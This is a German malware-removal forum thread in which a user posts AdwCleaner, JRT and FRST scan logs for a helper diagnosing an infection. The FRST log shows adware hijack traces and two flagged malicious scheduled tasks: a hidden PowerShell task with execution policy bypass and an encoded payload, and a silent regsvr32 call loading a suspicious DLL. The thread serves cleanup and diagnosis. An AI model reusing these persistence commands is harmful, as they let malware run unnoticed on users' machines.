[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pstatic.bestpriceninja.com
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pstatic.eshopcomp.com
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\re-markable.net
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\re-markit.co
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.re-markable00.re-markable.net
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.re-markit00.re-markit.co
[-] Schlüssel gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\utop.it
[-] Schlüssel gelöscht : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\bestpriceninja.com
[-] Schlüssel gelöscht : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\eshopcomp.com
[-] Schlüssel gelöscht : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pstatic.bestpriceninja.com
[-] Schlüssel gelöscht : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pstatic.eshopcomp.com
[-] Schlüssel gelöscht : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\utop.it
[-] Schlüssel gelöscht : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\bestpriceninja.com
[-] Schlüssel gelöscht : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\eshopcomp.com
[-] Schlüssel gelöscht : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pstatic.bestpriceninja.com
[-] Schlüssel gelöscht : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pstatic.eshopcomp.com
[-] Schlüssel gelöscht : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\utop.it
[-] Wert gelöscht : HKU\S-1-5-21-1076315954-907306345-2410837627-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Gameo]

***** [ Internetbrowser ] *****

[-] [C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\prefs.js] gelöscht : user_pref("browser.newtab.url", "hxxp://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAMQdlwKVFxGDAZAcQEVVQtEEhgbJQhbTF1FRVFFIl1cAg0UQhNBNARaB0tXUUEeGGlxR1dMY0dMLkNdIFAV");
[-] [C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\prefs.js] gelöscht : user_pref("browser.search.selectedEngine", "Web Search");
[-] [C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\prefs.js] gelöscht : user_pref("browser.startup.homepage", "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggVcw9dUwwUFhgQIwgATA1DFAYOeFwJAhQVFVFHJltcBVpFRFYFIk0FA18DB0VXfWFoKB8fHHdRL1dCBHgYRQ==");
[-] [C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\prefs.js] gelöscht : user_pref("network.hxxp.request.max-start-delay", 0);
[-] [C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\user.js] gelöscht : user_pref("network.hxxp.request.max-start-delay", 0);

*************************

:: "Tracing" Schlüssel gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Winsock Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [23179 Bytes] - [28/04/2016 17:02:10]
C:\AdwCleaner\AdwCleaner[S1].txt - [22938 Bytes] - [28/04/2016 17:00:59]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [23327 Bytes] ##########
         
--- --- ---

Und hier noch das vom JRT:

Code:
ATTFilter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.6 (04.25.2016)
Operating System: Windows 10 Home x64 
Ran by Maximilian (Administrator) on 28.04.2016 at 20:14:46,12
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 10 

Successfully deleted: C:\ProgramData\iobit\driver booster (Folder) 
Successfully deleted: C:\ProgramData\productdata (Folder) 
Successfully deleted: C:\ProgramData\reviversoft (Folder) 
Successfully deleted: C:\Users\Maximilian\AppData\Roaming\iobit\driver booster (Folder) 
Successfully deleted: C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\user.js (File) 
Successfully deleted: C:\Users\Maximilian\AppData\Roaming\nico mak computing (Folder) 
Successfully deleted: C:\Users\Maximilian\AppData\Roaming\productdata (Folder) 
Successfully deleted: C:\Program Files (x86)\iobit\driver booster (Folder) 
Successfully deleted: C:\Program Files\reviversoft (Folder) 
Successfully deleted: C:\WINDOWS\prefetch\DRIVERBOOSTER.EXE-137BF219.pf (File) 

Deleted the following from C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\prefs.js
user_pref(extensions.combo@yandex.ru.status.firstStart, 1460207577402);
user_pref(extensions.combo@yandex.ru.status.firstSuccess, 2016.04.09);
user_pref(extensions.combo@yandex.ru.status.guid.value, {910c19f4-858b-47c0-be7a-254be19ccb4b});
user_pref(extensions.combo@yandex.ru.status.lastSent, 1461507650828);
user_pref(extensions.combo@yandex.ru.status.lastSuccess, 1460207638);
user_pref(extensions.combo@yandex.ru.status.sessionTime, 1461507590828);
user_pref(extensions.combo@yandex.ru.status.undelivered, {\ldbdgusbi\:{\data\:\brandID=de&bn=Firefox&bv=38.0.1&clid=2229389&lang=de&os=WINNT&stat=dayuse&ui=%7B910c19f4
user_pref(extensions.xpiState, {\app-profile\:{\abb@amazon.com\:{\d\:\C:\\\\Users\\\\Maximilian\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\7oxehink.d



Registry: 2 

Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{a5bfd1d3-18b6-4fc3-b3f9-262ae3552dbe} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{a5bfd1d3-18b6-4fc3-b3f9-262ae3552dbe} (Registry Key)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 28.04.2016 at 20:16:41,93
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         

Alt 29.04.2016, 09:11   #23
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



Dann zeig mal frische FRST Logs. Haken setzen bei addition.txt dann auf Untersuchen klicken

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 29.04.2016, 15:36   #24
Maximilian1
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



FRST Additions Logfile:
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-04-2016
durchgeführt von Maximilian (2016-04-29 16:32:20)
Gestartet von C:\Users\Maximilian\Downloads
Windows 10 Home Version 1511 (X64) (2015-12-29 23:02:47)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1076315954-907306345-2410837627-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1076315954-907306345-2410837627-503 - Limited - Disabled)
Gast (S-1-5-21-1076315954-907306345-2410837627-501 - Limited - Disabled)
Maximilian (S-1-5-21-1076315954-907306345-2410837627-1001 - Administrator - Enabled) => C:\Users\Maximilian

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus und Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus und Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

abFiles (HKLM-x32\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 2.03.2003 - Acer Incorporated)
abPhoto (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 3.06.2000.22 - Acer Incorporated)
Acer Care Center (HKLM\...\{1AF41E84-3408-499A-8C93-8891F0612719}) (Version: 2.00.3005 - Acer Incorporated)
Acer Explorer Agent (HKLM\...\{4D0F42CF-1693-43D9-BDC8-19141D023EE0}) (Version: 2.00.3001 - Acer Incorporated)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 3.09.2002 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.8109 - Acer Incorporated)
Acer Quick Access (HKLM\...\{E3678E72-78E3-4F91-A9FB-913876FF6DA2}) (Version: 2.00.3008 - Acer Incorporated)
Acer UEIP Framework (HKLM\...\{12A718F2-2357-4D41-9E1F-18583A4745F7}) (Version: 2.02.3000 - Acer Incorporated)
Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{588B7DD2-3480-4A89-A8F6-C6781CBFAD56}) (Version: 1.5 - Eyeo GmbH)
Adobe Acrobat 5.0 (HKLM-x32\...\Adobe Acrobat 5.0) (Version: 5.1 - Adobe Systems, Inc.)
Adobe Flash Player 11 Plugin (HKLM-x32\...\{F83DD803-2467-4D07-9D6F-87AF0434410A}) (Version: 11.9.900.170 - Adobe Systems Incorporated)
Amazon 1Button App (HKLM-x32\...\{B6DCCCD3-520D-4485-B642-FCC136CE12C3}) (Version: 2.3.4 - Amazon) <==== ACHTUNG
AOP Framework (HKLM-x32\...\{4A37A114-702F-4055-A4B6-16571D4A5353}) (Version: 3.15.2000.1 - Acer Incorporated)
Avast SecureLine (HKLM\...\{2CD3C92F-EDC5-4B02-9B0A-9C1D37C58EF5}_is1) (Version: 1.0.239.4 - AVAST Software)
AVG (HKLM\...\AvgZen) (Version: 1.51.2.3593 - AVG Technologies)
AVG Zen (Version: 1.51.58 - AVG Technologies) Hidden
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5427.02 - CyberLink Corp.)
Dolby Audio X2 Windows API SDK (HKLM\...\{6A478BF2-F67F-4ABC-A7F1-B6B5BA862371}) (Version: 0.5.2.32 - Dolby Laboratories, Inc.)
Dolby Audio X2 Windows APP (HKLM\...\{7DA57EF8-9D20-4126-AF15-D0CC97D0C017}) (Version: 0.4.0.22 - Dolby Laboratories, Inc.)
DriverSetupUtility (HKLM\...\{2B51C83A-465D-4EA9-9CDC-1ED95ED09AC6}) (Version: 1.00.3011 - Acer Incorporated)
eBay Worldwide (HKLM-x32\...\{3DC26EA7-03E3-4353-9424-EEB7A34A7504}) (Version: 2.5.0427 - OEM)
FMW 1 (Version: 1.73.2 - AVG Technologies) Hidden
Foxit PhantomPDF (HKLM-x32\...\{A4023BDF-82D5-412D-9D58-8C2819EBFE2E}) (Version: 7.0.410.326 - Foxit Software Inc.)
Game Explorer Categories - genres (HKLM-x32\...\WildTangentGameProvider-acer-genres) (Version: 13.0.0.6 - WildTangent, Inc.)
Game Explorer Categories - main (HKLM-x32\...\WildTangentGameProvider-acer-main) (Version: 13.0.0.6 - WildTangent, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1162 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4279 - Intel Corporation)
Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.1519.7 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (x32 Version: 10.1.1.9 - Intel(R) Corporation) Hidden
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
Java 7 Update 65 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F06417065FF}) (Version: 7.0.650 - Oracle)
Jewel Match 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
Logitech Gaming Software 8.76 (HKLM\...\Logitech Gaming Software) (Version: 8.76.155 - Logitech Inc.)
Magic Academy (x32 Version: 2.2.0.97 - WildTangent) Hidden
McAfee LiveSafe (HKLM-x32\...\MSC) (Version: 14.0.8185 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.187 - McAfee, Inc.)
Medal of Honor: Pacific Assault™ (HKLM-x32\...\{56CFA833-F44F-4199-8C58-7F8B38F2BC7B}) (Version: 1.2.1.280 - Electronic Arts)
Microsoft Office 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.6769.2017 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 38.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 38.0.1 (x86 en-US)) (Version: 38.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 38.0.1 - Mozilla)
Need for Speed™ (HKLM-x32\...\{F8643E83-A868-4EE8-A0B9-389386830453}) (Version: 1.2.0.0 - Electronic Arts)
Need for Speed™ Carbon (HKLM-x32\...\{259C0ABB-A3B2-4D70-008F-BF7EE491B70B}) (Version:  - )
Need for Speed™ Most Wanted (HKLM-x32\...\{A48B9CD8-C2BA-4EC9-0081-7260D238C7CF}) (Version:  - )
Need for Speed™ Most Wanted (HKLM-x32\...\{FB0127F3-985B-44CE-AE29-378CAF60B361}) (Version: 1.5.0.0 - Electronic Arts)
Need for Speed™ ProStreet (HKLM-x32\...\{2E1A71D5-7897-4F3F-B0E3-B412C86A646D}) (Version: 1.0.1.0 - Electronic Arts)
NVIDIA GeForce Experience 2.5.11.45 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.11.45 - NVIDIA Corporation)
NVIDIA Grafiktreiber 353.62 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 353.62 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.6729.1014 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6729.1014 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.6729.1014 - Microsoft Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 9.0.13.2141 - Electronic Arts, Inc.)
Peggle (HKLM-x32\...\{715AD72D-887A-459E-988B-D4F3E87FA24B}) (Version: 1.04.0.0 - PopCap Games)
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
Qualcomm Atheros 11ac Wireless LAN&Bluetooth Installer (HKLM-x32\...\{3241744A-BA36-41F0-B4AA-EF3946D00632}) (Version: 11.0.0.0099 - Qualcomm Atheros)
RaceRoom Racing Experience  (HKLM-x32\...\Steam App 211500) (Version:  - Sector3 Studios)
RaceRoom Racing Experience Launcher (HKLM-x32\...\{1FD9F07F-7BBF-4C91-B3F0-A23714A3A913}_is1) (Version: 1.0 - Sector3 Studios)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.31213 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7621 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.94 (HKLM-x32\...\Revo Uninstaller) (Version: 1.94 - VS Revo Group)
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
SHIELD Streaming (Version: 4.1.3000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.5.11.45 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
The Crew (Worldwide) (HKLM-x32\...\Uplay Install 413) (Version:  - Ubisoft)
Thunderbolt(TM) Software (HKLM-x32\...\{5B88BE64-93E7-4D6B-83D0-37B911166FF2}) (Version: 15.2.35.250 - Intel Corporation)
Trojan Remover 6.9.4 (HKLM-x32\...\Trojan Remover_is1) (Version: 6.9.4 - Simply Super Software)
Trove (HKLM-x32\...\Steam App 304050) (Version:  - Trion Worlds)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Uplay (HKLM-x32\...\Uplay) (Version: 17.0 - Ubisoft)
Vegas World (x32 Version: 13.0.0.6 - WildTangent) Hidden
Villagers and Heroes (x32 Version: 13.0.0.6 - WildTangent) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WEB.DE MailCheck (HKLM-x32\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.6.1 - 1&1 Mail & Media GmbH)
WEB.DE Softwareaktualisierung (HKLM-x32\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.3.0 - 1&1 Mail & Media GmbH)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.11.16 - WildTangent) Hidden
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1076315954-907306345-2410837627-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Maximilian\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {01084E43-0D55-442D-B40F-F5D6FDCF36C1} - System32\Tasks\FUBTrackingByPLD => C:\OEM\Preload\FubTracking\FubTracking.exe [2015-05-14] ()
Task: {0219C0E7-B4CE-43E1-A637-5FA2AD0777CF} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {075A95DC-4B0C-4B14-9B19-AFD73A66C7A3} - System32\Tasks\Power Button => C:\Program Files\Acer\Acer Power Management\ePowerButton_NB.exe [2015-05-14] (Acer Incorporated)
Task: {07816D25-B5BD-4B83-945C-196E7DAD3483} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service on boot if driver is up => tbtsvc.exe
Task: {0AE3D1E7-8914-455D-BEE2-3F0FF768E32F} - System32\Tasks\SpyHunter4Startup => C:\Program Files\Enigma Software Group\SpyHunter\Spyhunter4.exe
Task: {21C0EA90-34D4-401C-B1D8-6900D89739A7} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-04-03] (Microsoft Corporation)
Task: {23FB098B-064A-42DC-B162-EA7F8F8FD25A} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected => start ThunderboltService
Task: {29E8CC38-AD54-4D44-ACB1-CB05CE2D4430} - System32\Tasks\{7A0C7D47-780D-047A-0F11-0D7A0B091108} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (Der Dateneintrag hat 9444 mehr Zeichen). <==== ACHTUNG
Task: {37515EB7-3473-4F5D-9FD2-F98A0DE6B1CA} - System32\Tasks\AcerCloud => C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe [2016-01-19] (Acer)
Task: {44CC53DE-9E31-4B46-9017-BAA9935EE96B} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-04-03] (Microsoft Corporation)
Task: {4F117C79-2706-4FBF-A748-C0259F51CEFA} - System32\Tasks\Software Update Application => C:\ProgramData\OEM\UpgradeTool\ListCheck.exe [2015-09-04] (Acer Incorporated)
Task: {535A4CD4-EFBE-4ECF-8798-E1BB6B655E13} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTrayLauncher.exe [2015-05-14] (Acer Incorporated)
Task: {6A1AECEC-0766-473B-AE79-EAAA31DE758F} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [2015-07-10] ()
Task: {6A250F7B-4F8A-4FEA-8CAE-31F28DA85202} - System32\Tasks\ACCBackgroundApplication => C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [2015-07-10] ()
Task: {6ACB0318-1EDD-4BD2-8C15-7439EE661ED2} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
Task: {6C30AC43-827D-46FD-A010-7F22700D33B8} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {6F308663-1125-4137-B807-F52625EA0527} - System32\Tasks\Registration 1und1 Task => C:\Program Files (x86)\1und1Softwareaktualisierung\cdsupdclient.exe [2015-01-12] (1&1 Mail & Media GmbH)
Task: {92D92148-2605-488E-B079-A6EF7FBB0F83} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt application on login if service is up => Thunderbolt.exe
Task: {93C99DC9-B400-40D5-A6DF-4310EAF3F1A6} - System32\Tasks\Avast SecureLine => C:\Program Files\AVAST Software\SecureLine\SecureLine.exe [2016-03-02] (AVAST Software)
Task: {995C12F3-964B-4156-97AD-39E4AB40AF3C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-14] (Microsoft Corporation)
Task: {9A1795C0-AC9B-4DF7-AE4D-B91F13345C59} - System32\Tasks\{4EC0A3F8-1913-4A85-AB3C-927C037406BA} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.18.0.112&amp;LastError=12002
Task: {ABC3FFB2-DF04-4DC1-A4B9-D53AE3BAE20B} - System32\Tasks\{60001023-7877-A386-82BC-AD83BFA87133} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\3f50a886\9b68ba7.dll" <==== ACHTUNG
Task: {ABDA4DDC-8B48-4635-B846-2193EE909A32} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2016-04-03] (Microsoft Corporation)
Task: {BC0FAC20-0079-480D-B9C6-3AAFD8C70812} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-16] (McAfee, Inc.)
Task: {CE77E71E-1B2F-4A10-A973-04EAA94718DF} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [2015-09-04] (Acer Incorporated)
Task: {DED90497-8EAB-43DD-9AE1-506163E2A4CA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-29] (Google Inc.)
Task: {E0C21389-EC01-402F-A776-C3731FA73825} - System32\Tasks\avast! SL Update => C:\Program Files\AVAST Software\SecureLine\SLUpdate.exe [2016-03-02] (AVAST Software)
